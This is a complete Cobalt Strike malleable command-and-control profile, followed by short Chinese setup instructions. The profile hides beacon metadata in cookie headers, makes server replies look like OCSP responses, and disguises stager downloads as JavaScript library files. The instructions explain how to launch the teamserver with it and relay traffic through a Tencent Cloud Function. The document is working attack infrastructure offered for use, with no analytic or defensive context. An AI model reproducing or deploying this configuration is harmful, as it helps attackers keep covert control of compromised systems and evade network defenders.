set sample_name "t"; set sleeptime "3000"; set jitter "0"; set maxdns "255"; set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get { set uri "/api/x"; client { header "Accept""*/*"; metadata { base64; prepend "SESSIONID="; header "Cookie"; } } server { header "Content-Type""application/ocsp-response"; header "content-transfer-encoding""binary"; header "Server""Nodejs"; output { base64; print; } } } http-stager { set uri_x86 "/vue.min.js"; set uri_x64 "/bootstrap-2.min.js"; }
http-post { set uri "/api/y"; client { header "Accept""*/*"; id { base64; prepend "JSESSION="; header "Cookie"; } output { base64; print; } } server { header "Content-Type""application/ocsp-response"; header "content-transfer-encoding""binary"; header "Connection""keep-alive"; output { base64; print; } } }
开启Cobalt Strike服务端./teamserver ip password tencent.profile 本地连接Cobal Strike,新添加个监听,将腾讯云函数的默认访问地址复制过来,复制的时候注意掐头去尾,不要http://,不要:80